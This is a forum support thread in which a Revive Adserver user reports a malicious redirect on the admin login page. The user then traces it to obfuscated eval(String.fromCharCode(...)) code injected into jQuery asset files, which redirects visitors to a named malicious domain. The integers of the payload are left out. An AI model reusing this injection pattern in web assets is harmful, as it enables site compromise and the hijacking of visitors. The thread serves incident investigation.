Jump to content

Malware detected on login for revive administration

Zhivko

By Zhivko
in Managing Revive Adserver

 Share

Recommended Posts

Zhivko Newbie

Zhivko

Posted
Posted

Hello everyone,

The company i work for uses revive adserver for placing ad banners on its multiple wordpress websites. We detected a malware that comes in form of redirect after we visit the login screen for revive administration (not yet logged in, just the logging screen). https://imgur.com/a/f0PVqUM (here is the screenshot on where it happens)

I investigated where this could possibly trigger and i found out that it happens in the OA_Start($checkRedirectFunc = null) function after this line:

phpAds_SessionDataRegister(OA_Auth::login($checkRedirectFunc));

The $checkRedirectFunc is null at that moment.

Could you help me please?
the link is https://rev.balkanmediagroup.com/www/admin/index.php

Regards,
Zhivko

Link to comment
Share on other sites
Zhivko Newbie

Zhivko

Posted
  • Author
Posted

I found the malicious code. It was in assets/js/jquery-1.2.3.js and assets/js/jquery-1.2.6-mod.js in form of:

eval(String.fromCharCode(<BUNCH INTEGERS SEPARATED BY COMMA HERE>)) which translates to a malicious code that sets the location source to "news.weatherplllatform.com" which injects two javascript scripts into the page: counter.js and stat.js which are setting some cookies and so on.
I removed the code from the jquery-1.2.6-mod.js that is used, but if you want i can revert it cause i saved a backup .bak file of it.
Due to some investigation purposes on our end, i left the jquery-1.2.3.js as it is (with the malicious code in it).

Please let me know if i should provide anything else or if i should revert back the malicious code so you can check if it came from your side somehow, and if not, confirm that to us so we can count that out and continue with our investigation deeper.

Regards,
Zhivko

Just now, Zhivko said:

I found the malicious code. It was in assets/js/jquery-1.2.3.js and assets/js/jquery-1.2.6-mod.js in form of:

eval(String.fromCharCode(<BUNCH INTEGERS SEPARATED BY COMMA HERE>)) which translates to a malicious code that sets the location source to "news.weatherplllatform.com" which injects two javascript scripts into the page: counter.js and stat.js which are setting some cookies and so on.
I removed the code from the jquery-1.2.6-mod.js that is used, but if you want i can revert it cause i saved a backup .bak file of it.
Due to some investigation purposes on our end, i left the jquery-1.2.3.js as it is (with the malicious code in it).

Please let me know if i should provide anything else or if i should revert back the malicious code so you can check if it came from your side somehow, and if not, confirm that to us so we can count that out and continue with our investigation deeper.

Regards,
Zhivko

Since i removed the malicious code from the jquery-.1.2.6-mod.js, you are no longer able to experience the redirect, just to clarify.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing


×
×
  • Create New...